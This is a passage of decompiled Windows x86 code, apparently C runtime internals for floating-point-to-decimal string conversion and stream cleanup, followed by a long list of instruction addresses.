												_v1908 = _t908;
											} while (_t908 != 0);
											_t1102 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1196 = _v1920;
									_t1245 = _t1196;
									_t1086 = _v472;
									_v1872 = _t1245;
									__eflags = _t1086;
									if(_t1086 != 0) {
										_t1249 = 0;
										_t1200 = 0;
										__eflags = 0;
										do {
											_t841 =  *(_t1273 + _t1200 * 4 - 0x1d0);
											_t1153 = 0xa;
											_t1154 = _t841 * _t1153 >> 0x20;
											 *(_t1273 + _t1200 * 4 - 0x1d0) = _t841 * _t1153 + _t1249;
											asm("adc edx, 0x0");
											_t1200 = _t1200 + 1;
											_t1249 = _t1154;
											__eflags = _t1200 - _t1086;
										} while (_t1200 != _t1086);
										_v1896 = _t1249;
										__eflags = _t1249;
										_t1245 = _v1872;
										if(_t1249 != 0) {
											_t1095 = _v472;
											__eflags = _t1095 - 0x73;
											if(_t1095 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E00D9AA64( &_v468, _t1064,  &_v2404, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												 *(_t1273 + _t1095 * 4 - 0x1d0) = _t1154;
												_v472 = _v472 + 1;
											}
										}
										_t1196 = _t1245;
									}
									_t815 = E00D9C0B0( &_v472,  &_v936);
									_t1146 = 0xa;
									__eflags = _t815 - _t1146;
									if(_t815 != _t1146) {
										__eflags = _t815;
										if(_t815 != 0) {
											_t816 = _t815 + 0x30;
											__eflags = _t816;
											_t1245 = _t1196 + 1;
											 *_t1196 = _t816;
											_v1872 = _t1245;
											goto L282;
										} else {
											_t817 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1245 = _t1196 + 1;
										_t832 = _v936;
										 *_t1196 = 0x31;
										_v1872 = _t1245;
										__eflags = _t832;
										if(_t832 != 0) {
											_t1199 = 0;
											_t1248 = _t832;
											_t1094 = 0;
											__eflags = 0;
											do {
												_t833 =  *(_t1273 + _t1094 * 4 - 0x3a0);
												 *(_t1273 + _t1094 * 4 - 0x3a0) = _t833 * _t1146 + _t1199;
												asm("adc edx, 0x0");
												_t1094 = _t1094 + 1;
												_t1199 = _t833 * _t1146 >> 0x20;
												_t1146 = 0xa;
												__eflags = _t1094 - _t1248;
											} while (_t1094 != _t1248);
											_t1245 = _v1872;
											__eflags = _t1199;
											if(_t1199 != 0) {
												_t836 = _v936;
												__eflags = _t836 - 0x73;
												if(_t836 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E00D9AA64( &_v932, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t836 * 4 - 0x3a0) = _t1199;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t817 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t817;
									_t1070 = _v1916;
									__eflags = _t817;
									if(_t817 >= 0) {
										__eflags = _t1070 - 0x7fffffff;
										if(_t1070 <= 0x7fffffff) {
											_t1070 = _t1070 + _t817;
											__eflags = _t1070;
										}
									}
									_t819 = _a24 - 1;
									__eflags = _t819 - _t1070;
									if(_t819 >= _t1070) {
										_t819 = _t1070;
									}
									_t755 = _t819 + _v1920;
									_v1916 = _t755;
									__eflags = _t1245 - _t755;
									if(__eflags != 0) {
										while(1) {
											_t755 = _v472;
											__eflags = _t755;
											if(__eflags == 0) {
												goto L303;
											}
											_t1197 = 0;
											_t1246 = _t755;
											_t1090 = 0;
											__eflags = 0;
											do {
												_t820 =  *(_t1273 + _t1090 * 4 - 0x1d0);
												 *(_t1273 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1197;
												asm("adc edx, 0x0");
												_t1090 = _t1090 + 1;
												_t1197 = _t820 * 0x3b9aca00 >> 0x20;
												__eflags = _t1090 - _t1246;
											} while (_t1090 != _t1246);
											_t1247 = _v1872;
											__eflags = _t1197;
											if(_t1197 != 0) {
												_t826 = _v472;
												__eflags = _t826 - 0x73;
												if(_t826 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E00D9AA64( &_v468, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t826 * 4 - 0x1d0) = _t1197;
													_v472 = _v472 + 1;
												}
											}
											_t825 = E00D9C0B0( &_v472,  &_v936);
											_t1198 = 8;
											_t1070 = _v1916 - _t1247;
											__eflags = _t1070;
											do {
												_t708 = _t825 % _v1912;
												_t825 = _t825 / _v1912;
												_t1151 = _t708 + 0x30;
												__eflags = _t1070 - _t1198;
												if(_t1070 >= _t1198) {
													 *((char*)(_t1198 + _t1247)) = _t1151;
												}
												_t1198 = _t1198 - 1;
												__eflags = _t1198 - 0xffffffff;
											} while (_t1198 != 0xffffffff);
											__eflags = _t1070 - 9;
											if(_t1070 > 9) {
												_t1070 = 9;
											}
											_t1245 = _t1247 + _t1070;
											_v1872 = _t1245;
											__eflags = _t1245 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1245 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1070 = _t1236 & 0x000fffff;
					if((_t1188 | _t1236 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0xda6ac4);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1055);
						if(E00D979F6() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00D97DBB();
							asm("int3");
							E00D8E2F0(_t1142, 0xdaa9e8, 0x10);
							_v32 = _v32 & 0x00000000;
							E00D99931(8);
							_pop(_t1071);
							_t721 =  &_v8;
							 *_t721 = _v8 & 0x00000000;
							__eflags =  *_t721;
							_t1237 = 3;
							while(1) {
								_v36 = _t1237;
								__eflags = _t1237 -  *0xdd0404; // 0x200
								if(__eflags == 0) {
									break;
								}
								_t763 =  *0xdd0408; // 0x0
								_t764 =  *(_t763 + _t1237 * 4);
								__eflags = _t764;
								if(_t764 != 0) {
									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
									if(__eflags != 0) {
										_t773 =  *0xdd0408; // 0x0
										_push( *((intOrPtr*)(_t773 + _t1237 * 4)));
										_t774 = E00D9EC83(_t1071, _t1142, __eflags);
										__eflags = _t774 - 0xffffffff;
										if(_t774 != 0xffffffff) {
											_t731 =  &_v32;
											 *_t731 = _v32 + 1;
											__eflags =  *_t731;
										}
									}
									_t767 =  *0xdd0408; // 0x0
									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1237 * 4)) + 0x20);
									_t770 =  *0xdd0408; // 0x0
									E00D97A50( *((intOrPtr*)(_t770 + _t1237 * 4)));
									_pop(_t1071);
									_t772 =  *0xdd0408; // 0x0
									_t737 = _t772 + _t1237 * 4;
									 *_t737 =  *(_t772 + _t1237 * 4) & 0x00000000;
									__eflags =  *_t737;
								}
								_t1237 = _t1237 + 1;
							}
							_v8 = 0xfffffffe;
							E00D9D991();
							return E00D8E336(_t1142);
						} else {
							L309:
							_t1286 = _v1936;
							if(_v1936 != 0) {
								_t755 = E00D9DFE5(_t1070, _t1286,  &_v1944);
							}
							return E00D8E203(_t755, _v8 ^ _t1273);
						}
					}
				}
			}































































































































































































































































              0x00d9c55e
              0x00d9c561
              0x00d9c563
              0x00d9c569
              0x00d9c570
              0x00d9c574
              0x00d9c57d
              0x00d9c57e
              0x00d9c57f
              0x00d9c582
              0x00d9c588
              0x00d9c58e
              0x00d9c593
              0x00d9c5a2
              0x00d9c5a4
              0x00d9c5a6
              0x00d9c5a6
              0x00d9c5ad
              0x00d9c5b7
              0x00d9c5bc
              0x00d9c5bf
              0x00d9c5e3
              0x00d9c5e7
              0x00d9c5ec
              0x00d9c5ed
              0x00d9c5ef
              0x00d9c5f1
              0x00d9c5f7
              0x00d9c5f7
              0x00d9c5fe
              0x00d9c5fe
              0x00d9c601
              0x00d9d8b1
              0x00000000
              0x00d9c607
              0x00d9c607
              0x00d9c607
              0x00d9c60a
              0x00d9d8aa
              0x00000000
              0x00d9c610
              0x00d9c610
              0x00d9c610
              0x00d9c613
              0x00d9d8a3
              0x00000000
              0x00d9c619
              0x00d9c619
              0x00d9c61c
              0x00d9d89c
              0x00000000
              0x00d9c622
              0x00d9c62b
              0x00d9c633
              0x00d9c636
              0x00d9c639
              0x00d9c63c
              0x00d9c642
              0x00d9c64a
              0x00d9c650
              0x00d9c65a
              0x00d9c65a
              0x00d9c65d
              0x00d9c665
              0x00d9c66c
              0x00d9c66c
              0x00d9c65f
              0x00d9c65f
              0x00d9c661
              0x00d9c674
              0x00d9c67a
              0x00d9c67c
              0x00d9c680
              0x00d9c685
              0x00d9c692
              0x00d9c694
              0x00d9c69a
              0x00d9c69f
              0x00d9c6a0
              0x00d9c6a1
              0x00d9c6ab
              0x00d9c6b0
              0x00d9c6b6
              0x00d9c6bb
              0x00d9c6c4
              0x00d9c6c4
              0x00d9c6c6
              0x00d9c6bd
              0x00d9c6bd
              0x00d9c6c2
              0x00000000
              0x00000000
              0x00d9c6c2
              0x00d9c6cc
              0x00d9c6d4
              0x00d9c6d6
              0x00d9c6df
              0x00d9c6e0
              0x00d9c6e6
              0x00d9c6e8
              0x00d9cadb
              0x00d9cae1
              0x00d9cc00
              0x00d9cc00
              0x00d9cc07
              0x00d9cc07
              0x00d9cc07
              0x00d9cc0e
              0x00d9cc11
              0x00d9cc18
              0x00d9cc18
              0x00d9cc13
              0x00d9cc13
              0x00d9cc13
              0x00d9cc1c
              0x00d9cc1d
              0x00d9cc1f
              0x00d9cc22
              0x00d9cc25
              0x00d9cc28
              0x00d9cc2e
              0x00d9cc31
              0x00d9cc34
              0x00d9cc3e
              0x00d9cc3e
              0x00d9cc3e
              0x00d9cc36
              0x00d9cc36
              0x00d9cc38
              0x00000000
              0x00d9cc3a
              0x00d9cc3a
              0x00d9cc3a
              0x00d9cc38
              0x00d9cc40
              0x00d9cc42
              0x00d9cce3
              0x00d9cce3
              0x00d9ccf0
              0x00d9ccf0
              0x00d9ccf0
              0x00d9cd06
              0x00d9cd0b
              0x00d9cc48
              0x00d9cc48
              0x00d9cc4a
              0x00000000
              0x00d9cc50
              0x00d9cc52
              0x00d9cc53
              0x00d9cc55
              0x00d9cc57
              0x00d9cc57
              0x00d9cc59
              0x00d9cc5c
              0x00d9cc64
              0x00d9cc66
              0x00d9cc69
              0x00d9cc6f
              0x00d9cc6f
              0x00d9cc71
              0x00d9cc7d
              0x00d9cc7d
              0x00d9cc7d
              0x00d9cc73
              0x00d9cc75
              0x00d9cc75
              0x00d9cc84
              0x00d9cc87
              0x00d9cc89
              0x00d9cc90
              0x00d9cc90
              0x00d9cc8b
              0x00d9cc8b
              0x00d9cc8b
              0x00d9cc98
              0x00d9cca2
              0x00d9cca8
              0x00d9cca9
              0x00d9ccae
              0x00d9ccb4
              0x00d9ccb7
              0x00000000
              0x00000000
              0x00d9ccb9
              0x00d9ccb9
              0x00d9ccc1
              0x00d9ccc1
              0x00d9ccc7
              0x00d9ccce
              0x00d9ccdb
              0x00d9ccd0
              0x00d9ccd0
              0x00d9ccd3
              0x00d9ccd3
              0x00d9ccce
              0x00d9cc4a
              0x00d9cd17
              0x00d9cd27
              0x00d9cd34
              0x00d9cd36
              0x00d9cd3d
              0x00d9cae7
              0x00d9cae7
              0x00d9caf0
              0x00d9caf1
              0x00d9cafb
              0x00d9cb01
              0x00d9cb03
              0x00d9cb09
              0x00d9cb09
              0x00d9cb0b
              0x00d9cb0b
              0x00d9cb12
              0x00d9cb19
              0x00000000
              0x00000000
              0x00d9cb1f
              0x00d9cb22
              0x00d9cb25
              0x00000000
              0x00d9cb27
              0x00d9cb27
              0x00d9cb27
              0x00d9cb27
              0x00d9cb2e
              0x00d9cb31
              0x00d9cb38
              0x00d9cb38
              0x00d9cb33
              0x00d9cb33
              0x00d9cb33
              0x00d9cb3c
              0x00d9cb3f
              0x00d9cb41
              0x00d9cb43
              0x00d9cb49
              0x00d9cb4f
              0x00d9cb51
              0x00d9cb51
              0x00d9cb51
              0x00d9cb58
              0x00d9cb58
              0x00d9cb5a
              0x00d9cb66
              0x00d9cb66
              0x00d9cb66
              0x00d9cb5c
              0x00d9cb5e
              0x00d9cb5e
              0x00d9cb6d
              0x00d9cb70
              0x00d9cb72
              0x00d9cb79
              0x00d9cb79
              0x00d9cb74
              0x00d9cb74
              0x00d9cb74
              0x00d9cb81
              0x00d9cb8c
              0x00d9cb92
              0x00d9cb93
              0x00d9cb98
              0x00d9cb9e
              0x00d9cba1
              0x00000000
              0x00000000
              0x00d9cba3
              0x00d9cba3
              0x00d9cbad
              0x00d9cbb8
              0x00d9cbc0
              0x00d9cbc6
              0x00d9cbd1
              0x00d9cbd7
              0x00d9cbde
              0x00d9cbf1
              0x00d9cbf8
              0x00d9cbf8
              0x00000000
              0x00d9cb25
              0x00d9cb0b
              0x00000000
              0x00d9cb03
              0x00d9cd40
              0x00d9cd40
              0x00d9cd46
              0x00d9cd4b
              0x00d9cd51
              0x00d9cd64
              0x00d9cd69
              0x00d9c6ee
              0x00d9c6ee
              0x00d9c6f7
              0x00d9c6f8
              0x00d9c702
              0x00d9c708
              0x00d9c70a
              0x00d9c910
              0x00d9c918
              0x00d9c91b
              0x00d9c920
              0x00d9c923
              0x00d9c92b
              0x00d9c92f
              0x00d9c935
              0x00d9c93b
              0x00d9c940
              0x00d9c947
              0x00d9c948
              0x00d9c948
              0x00d9c948
              0x00d9c94f
              0x00d9c952
              0x00d9c95a
              0x00d9c960
              0x00d9c965
              0x00d9c965
              0x00d9c962
              0x00d9c962
              0x00d9c962
              0x00d9c969
              0x00d9c96a
              0x00d9c96c
              0x00d9c96f
              0x00d9c975
              0x00d9c97b
              0x00d9c97e
              0x00d9c981
              0x00d9c987
              0x00d9c98a
              0x00d9c98d
              0x00d9c997
              0x00d9c997
              0x00d9c997
              0x00d9c98f
              0x00d9c98f
              0x00d9c991
              0x00000000
              0x00d9c993
              0x00d9c993
              0x00d9c993
              0x00d9c991
              0x00d9c999
              0x00d9c99b
              0x00d9ca8d
              0x00d9ca8d
              0x00d9ca8f
              0x00d9ca95
              0x00d9ca9b
              0x00d9cab0
              0x00d9cab5
              0x00d9c9a1
              0x00d9c9a1
              0x00d9c9a3
              0x00000000
              0x00d9c9a9
              0x00d9c9ab
              0x00d9c9ac
              0x00d9c9ae
              0x00d9c9b0
              0x00d9c9b2
              0x00d9c9b2
              0x00d9c9b8
              0x00d9c9ba
              0x00d9c9c0
              0x00d9c9c3
              0x00d9c9d1
              0x00d9c9d7
              0x00d9c9d7
              0x00d9c9d9
              0x00d9c9dc
              0x00d9c9e2
              0x00d9c9e2
              0x00d9c9e4
              0x00000000
              0x00000000
              0x00d9c9e6
              0x00d9c9e8
              0x00d9c9ee
              0x00d9c9ee
              0x00d9c9ea
              0x00d9c9ea
              0x00d9c9ea
              0x00d9c9f3
              0x00d9c9f5
              0x00d9c9fc
              0x00d9c9fc
              0x00d9c9f7
              0x00d9c9f7
              0x00d9c9f7
              0x00d9ca22
              0x00d9ca28
              0x00d9ca2b
              0x00d9ca31
              0x00d9ca38
              0x00d9ca39
              0x00d9ca3a
              0x00d9ca40
              0x00d9ca43
              0x00d9ca45
              0x00000000
              0x00d9ca45
              0x00000000
              0x00d9ca43
              0x00d9ca4d
              0x00d9ca53
              0x00d9ca5b
              0x00d9ca5b
              0x00d9ca5c
              0x00d9ca5e
              0x00d9ca62
              0x00d9ca6a
              0x00d9ca6a
              0x00d9ca6a
              0x00d9ca6c
              0x00d9ca73
              0x00d9ca78
              0x00d9ca85
              0x00d9ca7a
              0x00d9ca7d
              0x00d9ca7d
              0x00d9ca78
              0x00d9c9a3
              0x00d9cab8
              0x00d9cac2
              0x00d9cac8
              0x00d9cace
              0x00d9cad4
              0x00d9c710
              0x00d9c710
              0x00d9c710
              0x00d9c712
              0x00d9c719
              0x00d9c720
              0x00000000
              0x00000000
              0x00d9c726
              0x00d9c729
              0x00d9c72c
              0x00000000
              0x00d9c72e
              0x00d9c736
              0x00d9c73b
              0x00d9c740
              0x00d9c741
              0x00d9c743
              0x00d9c74b
              0x00d9c74f
              0x00d9c755
              0x00d9c75b
              0x00d9c760
              0x00d9c767
              0x00d9c767
              0x00d9c768
              0x00d9c76b
              0x00d9c773
              0x00d9c779
              0x00d9c77e
              0x00d9c77e
              0x00d9c77b
              0x00d9c77b
              0x00d9c77b
              0x00d9c782
              0x00d9c783
              0x00d9c785
              0x00d9c788
              0x00d9c78e
              0x00d9c794
              0x00d9c797
              0x00d9c79a
              0x00d9c7a0
              0x00d9c7a3
              0x00d9c7a6
              0x00d9c7b0
              0x00d9c7b0
              0x00d9c7b0
              0x00d9c7a8
              0x00d9c7a8
              0x00d9c7aa
              0x00000000
              0x00d9c7ac
              0x00d9c7ac
              0x00d9c7ac
              0x00d9c7aa
              0x00d9c7b2
              0x00d9c7b4
              0x00d9c8a9
              0x00d9c8a9
              0x00d9c8ab
              0x00d9c8b1
              0x00d9c8b7
              0x00d9c8cc
              0x00d9c8d1
              0x00d9c7ba
              0x00d9c7ba
              0x00d9c7bc
              0x00000000
              0x00d9c7c2
              0x00d9c7c4
              0x00d9c7c5
              0x00d9c7c7
              0x00d9c7c9
              0x00d9c7cb
              0x00d9c7cb
              0x00d9c7d1
              0x00d9c7d3
              0x00d9c7d9
              0x00d9c7dc
              0x00d9c7ea
              0x00d9c7f0
              0x00d9c7f0
              0x00d9c7f2
              0x00d9c7f5
              0x00d9c7fb
              0x00d9c7fb
              0x00d9c7fd
              0x00000000
              0x00000000
              0x00d9c7ff
              0x00d9c801
              0x00d9c807
              0x00d9c807
              0x00d9c803
              0x00d9c803
              0x00d9c803
              0x00d9c80c
              0x00d9c80e
              0x00d9c81b
              0x00d9c81b
              0x00d9c810
              0x00d9c816
              0x00d9c816
              0x00d9c839
              0x00d9c841
              0x00d9c848
              0x00d9c84f
              0x00d9c850
              0x00d9c853
              0x00d9c859
              0x00d9c85f
              0x00d9c862
              0x00d9c864
              0x00000000
              0x00d9c864
              0x00000000
              0x00d9c862
              0x00d9c86c
              0x00d9c872
              0x00d9c872
              0x00d9c878
              0x00d9c87a
              0x00d9c884
              0x00d9c886
              0x00d9c886
              0x00d9c886
              0x00d9c888
              0x00d9c88f
              0x00d9c894
              0x00d9c8a1
              0x00d9c896
              0x00d9c899
              0x00d9c899
              0x00d9c894
              0x00d9c7bc
              0x00d9c8d4
              0x00d9c8df
              0x00d9c8e0
              0x00d9c8e1
              0x00d9c8e7
              0x00d9c8ed
              0x00d9c8f3
              0x00d9c8f3
              0x00000000
              0x00d9c72c
              0x00000000
              0x00d9c712
              0x00d9c8f4
              0x00d9c8fa
              0x00d9c901
              0x00d9c902
              0x00d9c903
              0x00d9c908
              0x00d9c908
              0x00d9cd6c
              0x00d9cd76
              0x00d9cd77
              0x00d9cd7d
              0x00d9cd7f
              0x00d9d1e8
              0x00d9d1ea
              0x00d9d1ec
              0x00d9d1f2
              0x00d9d1f4
              0x00d9d1fa
              0x00d9d1fc
              0x00d9d54e
              0x00d9d54e
              0x00d9d550
              0x00d9d556
              0x00d9d55d
              0x00d9d563
              0x00d9d565
              0x00d9d603
              0x00d9d603
              0x00d9d605
              0x00d9d606
              0x00d9d60c
              0x00000000
              0x00d9d56b
              0x00d9d56b
              0x00d9d56e
              0x00d9d574
              0x00d9d57a
              0x00d9d57c
              0x00d9d582
              0x00d9d584
              0x00d9d584
              0x00d9d586
              0x00d9d586
              0x00d9d58f
              0x00d9d596
              0x00d9d59c
              0x00d9d59f
              0x00d9d5a0
              0x00d9d5a2
              0x00d9d5a2
              0x00d9d5a6
              0x00d9d5a8
              0x00d9d5aa
              0x00d9d5b0
              0x00d9d5b3
              0x00000000
              0x00d9d5b5
              0x00d9d5b5
              0x00d9d5bc
              0x00d9d5bc
              0x00d9d5b3
              0x00d9d5a8
              0x00d9d57c
              0x00d9d56e
              0x00d9d565
              0x00d9d202
              0x00d9d202
              0x00d9d202
              0x00d9d205
              0x00d9d209
              0x00d9d209
              0x00d9d20a
              0x00d9d21c
              0x00d9d229
              0x00d9d238
              0x00d9d262
              0x00d9d267
              0x00d9d26d
              0x00d9d270
              0x00d9d276
              0x00d9d279
              0x00d9d312
              0x00d9d319
              0x00d9d397
              0x00d9d39d
              0x00d9d3a3
              0x00d9d3a6
              0x00d9d3a8
              0x00d9d431
              0x00d9d3ae
              0x00d9d3ae
              0x00d9d3b4
              0x00d9d3b4
              0x00d9d3ba
              0x00d9d3c0
              0x00d9d3c2
              0x00d9d3c4
              0x00d9d3c4
              0x00d9d3ca
              0x00d9d3d0
              0x00d9d3d2
              0x00d9d3da
              0x00d9d3da
              0x00d9d3e0
              0x00d9d3e2
              0x00d9d3e4
              0x00d9d3ea
              0x00d9d3ec
              0x00d9d503
              0x00d9d505
              0x00d9d50b
              0x00d9d50b
              0x00d9d50e
              0x00d9d50f
              0x00000000
              0x00d9d3f2
              0x00d9d3f8
              0x00d9d3f8
              0x00d9d3fa
              0x00d9d400
              0x00d9d403
              0x00d9d40a
              0x00d9d410
              0x00d9d412
              0x00d9d439
              0x00d9d43b
              0x00d9d43d
              0x00d9d43f
              0x00d9d445
              0x00d9d44b
              0x00d9d4e5
              0x00d9d4e5
              0x00d9d4e8
              0x00000000
              0x00d9d4ee
              0x00d9d4ee
              0x00d9d4f4
              0x00000000
              0x00d9d4f4
              0x00d9d451
              0x00d9d451
              0x00d9d451
              0x00d9d454
              0x00000000
              0x00000000
              0x00d9d456
              0x00d9d458
              0x00d9d45a
              0x00d9d463
              0x00d9d463
              0x00d9d465
              0x00d9d46b
              0x00d9d46b
              0x00d9d477
              0x00d9d482
              0x00d9d485
              0x00d9d492
              0x00d9d495
              0x00d9d496
              0x00d9d497
              0x00d9d49d
              0x00d9d49f
              0x00d9d4a5
              0x00d9d4ab
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d9d4ad
              0x00d9d4ad
              0x00d9d4ad
              0x00d9d4af
              0x00000000
              0x00000000
              0x00d9d4b1
              0x00d9d4b4
              0x00000000
              0x00d9d4ba
              0x00d9d4ba
              0x00d9d4bc
              0x00d9d4be
              0x00d9d4be
              0x00d9d4be
              0x00d9d4c6
              0x00d9d4c9
              0x00d9d4c9
              0x00d9d4cf
              0x00d9d4d1
              0x00d9d4d3
              0x00d9d4da
              0x00d9d4e0
              0x00d9d4e2
              0x00000000
              0x00d9d4e2
              0x00000000
              0x00d9d4b4
              0x00000000
              0x00d9d4ad
              0x00000000
              0x00d9d451
              0x00d9d414
              0x00d9d414
              0x00d9d416
              0x00d9d41c
              0x00d9d423
              0x00d9d423
              0x00d9d426
              0x00d9d426
              0x00000000
              0x00d9d416
              0x00000000
              0x00d9d4fa
              0x00d9d4fa
              0x00d9d4fb
              0x00d9d4fb
              0x00000000
              0x00d9d400
              0x00d9d31b
              0x00d9d31b
              0x00d9d32d
              0x00d9d33c
              0x00d9d341
              0x00d9d344
              0x00d9d346
              0x00000000
              0x00d9d34c
              0x00d9d34c
              0x00d9d34f
              0x00000000
              0x00d9d355
              0x00d9d355
              0x00d9d35c
              0x00000000
              0x00d9d362
              0x00d9d368
              0x00d9d36a
              0x00d9d370
              0x00d9d370
              0x00d9d372
              0x00d9d372
              0x00d9d374
              0x00d9d37d
              0x00d9d384
              0x00d9d387
              0x00d9d388
              0x00d9d38a
              0x00d9d38a
              0x00000000
              0x00d9d392
              0x00d9d35c
              0x00d9d34f
              0x00d9d346
              0x00d9d27f
              0x00d9d27f
              0x00d9d285
              0x00d9d287
              0x00d9d2a3
              0x00d9d2a6
              0x00000000
              0x00d9d2ac
              0x00d9d2ac
              0x00d9d2b3
              0x00000000
              0x00d9d2b9
              0x00d9d2bf
              0x00d9d2c1
              0x00d9d2c7
              0x00d9d2c7
              0x00d9d2c9
              0x00d9d2c9
              0x00d9d2cb
              0x00d9d2d4
              0x00d9d2db
              0x00d9d2de
              0x00d9d2df
              0x00d9d2e1
              0x00d9d2e1
              0x00d9d2e9
              0x00d9d2e9
              0x00d9d2eb
              0x00000000
              0x00d9d2f1
              0x00d9d2f1
              0x00d9d2f7
              0x00d9d2fa
              0x00d9d5c4
              0x00d9d5c7
              0x00d9d5cd
              0x00d9d5e2
              0x00d9d5e7
              0x00d9d5ea
              0x00d9d300
              0x00d9d300
              0x00d9d307
              0x00000000
              0x00d9d307
              0x00d9d2fa
              0x00d9d2eb
              0x00d9d2b3
              0x00d9d289
              0x00d9d289
              0x00d9d28b
              0x00d9d291
              0x00d9d297
              0x00d9d298
              0x00d9d515
              0x00d9d515
              0x00d9d51c
              0x00d9d51d
              0x00d9d51e
              0x00d9d523
              0x00d9d526
              0x00d9d526
              0x00d9d526
              0x00d9d287
              0x00d9d528
              0x00d9d528
              0x00d9d52a
              0x00d9d5f1
              0x00d9d5f8
              0x00d9d5ff
              0x00d9d612
              0x00d9d618
              0x00d9d619
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d9d530
              0x00d9d536
              0x00d9d536
              0x00d9d53c
              0x00d9d53c
              0x00d9d548
              0x00000000
              0x00d9d548
              0x00d9cd85
              0x00d9cd85
              0x00d9cd87
              0x00d9cd8d
              0x00d9cd8f
              0x00d9cd95
              0x00d9cd97
              0x00d9d10e
              0x00d9d10e
              0x00d9d110
              0x00d9d116
              0x00d9d11d
              0x00d9d11f
              0x00d9d17e
              0x00d9d181
              0x00d9d187
              0x00d9d18d
              0x00d9d193
              0x00d9d195
              0x00d9d19b
              0x00d9d19d
              0x00d9d19d
              0x00d9d19f
              0x00d9d19f
              0x00d9d1a1
              0x00d9d1aa
              0x00d9d1b1
              0x00d9d1b4
              0x00d9d1b5
              0x00d9d1b7
              0x00d9d1b7
              0x00d9d1bf
              0x00d9d1c1
              0x00d9d1c7
              0x00d9d1cd
              0x00d9d1d0
              0x00000000
              0x00d9d1d6
              0x00d9d1d6
              0x00d9d1dd
              0x00d9d1dd
              0x00d9d1d0
              0x00d9d1c1
              0x00d9d195
              0x00d9d121
              0x00d9d121
              0x00d9d123
              0x00d9d129
              0x00d9d12f
              0x00000000
              0x00d9d12f
              0x00d9d11f
              0x00d9cd9d
              0x00d9cd9d
              0x00d9cd9d
              0x00d9cda0
              0x00d9cda4
              0x00d9cda4
              0x00d9cda5
              0x00d9cdb7
              0x00d9cdc4
              0x00d9cdd3
              0x00d9cdfd
              0x00d9ce02
              0x00d9ce08
              0x00d9ce0b
              0x00d9ce11
              0x00d9ce14
              0x00d9ce90
              0x00d9ce97
              0x00d9cf5b
              0x00d9cf61
              0x00d9cf67
              0x00d9cf6a
              0x00d9cf6c
              0x00d9cff5
              0x00d9cf72
              0x00d9cf72
              0x00d9cf78
              0x00d9cf78
              0x00d9cf7e
              0x00d9cf84
              0x00d9cf86
              0x00d9cf88
              0x00d9cf88
              0x00d9cf8e
              0x00d9cf94
              0x00d9cf96
              0x00d9cf9e
              0x00d9cf9e
              0x00d9cfa4
              0x00d9cfa6
              0x00d9cfa8
              0x00d9cfae
              0x00d9cfb0
              0x00d9d0c7
              0x00d9d0c9
              0x00d9d0cf
              0x00d9d0cf
              0x00000000
              0x00d9cfb6
              0x00d9cfbc
              0x00d9cfbc
              0x00d9cfbe
              0x00d9cfc4
              0x00d9cfc7
              0x00d9cfce
              0x00d9cfd4
              0x00d9cfd6
              0x00d9cffd
              0x00d9cfff
              0x00d9d001
              0x00d9d003
              0x00d9d009
              0x00d9d00f
              0x00d9d0a9
              0x00d9d0a9
              0x00d9d0ac
              0x00000000
              0x00d9d0b2
              0x00d9d0b2
              0x00d9d0b8
              0x00000000
              0x00d9d0b8
              0x00d9d015
              0x00d9d015
              0x00d9d015
              0x00d9d018
              0x00000000
              0x00000000
              0x00d9d01a
              0x00d9d01c
              0x00d9d01e
              0x00d9d027
              0x00d9d027
              0x00d9d029
              0x00d9d02f
              0x00d9d02f
              0x00d9d03b
              0x00d9d046
              0x00d9d049
              0x00d9d056
              0x00d9d059
              0x00d9d05a
              0x00d9d05b
              0x00d9d061
              0x00d9d063
              0x00d9d069
              0x00d9d06f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d9d071
              0x00d9d071
              0x00d9d071
              0x00d9d073
              0x00000000
              0x00000000
              0x00d9d075
              0x00d9d078
              0x00d9d132
              0x00d9d132
              0x00d9d134
              0x00d9d13a
              0x00d9d140
              0x00d9d141
              0x00000000
              0x00d9d07e
              0x00d9d07e
              0x00d9d080
              0x00d9d082
              0x00d9d082
              0x00d9d082
              0x00d9d08a
              0x00d9d08d
              0x00d9d08d
              0x00d9d093
              0x00d9d095
              0x00d9d097
              0x00d9d09e
              0x00d9d0a4
              0x00d9d0a6
              0x00000000
              0x00d9d0a6
              0x00000000
              0x00d9d078
              0x00000000
              0x00d9d071
              0x00000000
              0x00d9d015
              0x00d9cfd8
              0x00d9cfd8
              0x00d9cfda
              0x00d9cfe0
              0x00d9cfe7
              0x00d9cfe7
              0x00d9cfea
              0x00d9cfea
              0x00000000
              0x00d9cfda
              0x00000000
              0x00d9d0be
              0x00d9d0be
              0x00d9d0bf
              0x00d9d0bf
              0x00000000
              0x00d9cfc4
              0x00d9ce9d
              0x00d9ce9d
              0x00d9ceaf
              0x00d9cebe
              0x00d9cec3
              0x00d9cec6
              0x00d9cec8
              0x00d9cee4
              0x00d9cee7
              0x00000000
              0x00d9ceed
              0x00d9ceed
              0x00d9cef4
              0x00000000
              0x00d9cefa
              0x00d9cf00
              0x00d9cf02
              0x00d9cf08
              0x00d9cf08
              0x00d9cf0a
              0x00d9cf0a
              0x00d9cf0c
              0x00d9cf15
              0x00d9cf1c
              0x00d9cf1f
              0x00d9cf20
